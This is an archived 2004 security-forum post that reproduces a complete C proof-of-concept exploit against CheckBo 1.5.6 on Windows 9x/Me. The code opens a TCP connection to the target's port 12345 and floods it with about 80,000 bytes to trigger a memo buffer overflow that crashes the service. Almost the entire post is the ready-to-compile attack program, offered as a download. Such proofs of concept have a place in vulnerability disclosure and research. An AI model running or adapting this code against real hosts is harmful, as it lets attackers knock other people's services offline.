hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Checkbo 1.5.6 Memo Overflow
GovernmentSecurity.org > The Archives > Public Downloads
nowhere
Mar 31 2004, 09:55 PM
QUOTE
/*

CheckBo 1.5.6 memo overflow (only for ChecBo that run on Win9x/Me)
by Luigi Auriemma (e-mail: aluigi@pivx.com)

UNIX & WIN VERSION

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define    close    closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER    "0.2"
#define BYTES  "ABCDEFGHIJ"
#define PORT    12345




u_long resolv(char *host);
void std_err(void);






int main(int argc, char *argv[]) {
    struct    sockaddr_in    peer;
    int    sd,
        err,
        i;


    setbuf(stdout, NULL);

    printf("\n"
        "CheckBo 1.5.6 memo overflow (only for ChecBo that run on Win9x/Me) "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@pivx.com\n"
        "web:    http://aluigi.altervista.org\n"
        "\n");

    if(argc < 2) {
        printf("\nUsage: %s <host> [port(12345)]\n", argv[0]);
        exit(1);
    }



#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif


    peer.sin_addr.s_addr = resolv(argv[1]);
    if(!argv[2]) peer.sin_port = htons(PORT);
        else peer.sin_port = htons(atoi(argv[2]));
    peer.sin_family = AF_INET;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();

    for(i = 0; i < 8000; i++) {   
        err = send(sd, BYTES, 10, 0);
        if(err < 0) {
            printf("\nCheckBo crashed with %d0 bytes!\n", i);
            break;
        }
    }
   
    close(sd);
    printf("\nCrash bytes sent.\n\n");
    return(0);
}




u_long resolv(char *host) {
    struct        hostent    *hp;
    u_long        host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n",
                host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }

    return(host_ip);
}






#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.